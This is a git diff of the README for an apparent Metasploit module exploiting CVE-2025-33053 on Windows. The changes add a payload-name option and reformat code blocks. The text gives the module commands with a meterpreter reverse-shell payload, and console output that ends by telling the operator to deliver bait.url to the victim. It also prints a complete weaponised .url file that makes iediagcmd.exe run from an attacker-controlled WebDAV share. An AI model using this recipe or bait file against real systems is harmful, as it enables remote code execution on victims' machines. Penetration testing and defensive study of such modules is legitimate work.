@@ -64,6 +64,10 @@ It supports:
6464
6565Whether to generate payload and move to WebDAV directory (default: true)
6666
67+ ### PAYLOAD_NAME
68+
69+ Output payload file name (default: route.exe)
70+
6771### START_LISTENER
6872
6973Whether to auto-start a Metasploit multi/handler (default: true)
@@ -104,46 +108,49 @@ You can use this module in:
104108
105109## Example Usage
106110
107- ``` console
111+ ```
108112use exploits/windows/fileformat/cve_2025_33053
109113set LHOST 192.168.1.10
110114run
111- ```console
115+ ```
112116
113117Optional:
114118
115- ```console
119+ ```
116120set WEBDAV_DIR /var/www/webdav
117121set OUTFILE clickme.url
118122set PAYLOAD windows/x64/meterpreter/reverse_http
119123run
120- ```console
124+ ```
121125
122126## Output
123127
128+ ```
124129msf6 > use exploit/windows/fileformat/cve_2025_33053
125130[*] Using configured payload windows/x64/meterpreter/reverse_tcp
126131msf6 exploit(windows/fileformat/cve_2025_33053) > set LHOST 192.168.1.15
127132LHOST => 192.168.1.15
128- msf6 exploit(windows/fileformat/cve_2025_33053) > run
133+ msf6 exploit(windows/fileformat/cve_2025_33053) > exploit
129134[*] Started reverse TCP handler on 192.168.1.15:4444
130135[*] Creating WebDAV directory if not exists...
131- [+] Generating payload at: /var/www/webdav/payload.exe
132- [+] Payload successfully written to /var/www/webdav/payload.exe
133- [+] .URL file written to: /home/kali/bait.url
134- [*] Module complete. Deliver /home/kali/bait.url to victim.
136+ [*] Generating payload...
137+ [+] Payload successfully written to /var/www/webdav/route.exe
138+ [*] Generating .URL file...
139+ [+] .URL file written to: bait.url
140+ [*] Module complete. Deliver /home/kali/metasploit-framework/bait.url to victim.
141+ ```
135142
136143Example .url file:
137144
138- ```console
145+ ```
139146[InternetShortcut]
140147URL=C:\Program Files\Internet Explorer\iediagcmd.exe
141148WorkingDirectory=\\192.168.1.10\webdav\
142149ShowCommand=7
143150IconIndex=13
144151IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
145152Modified=20F06BA06D07BD014D
146- ```console
153+ ```
147154
148155## References
149156
0 commit comments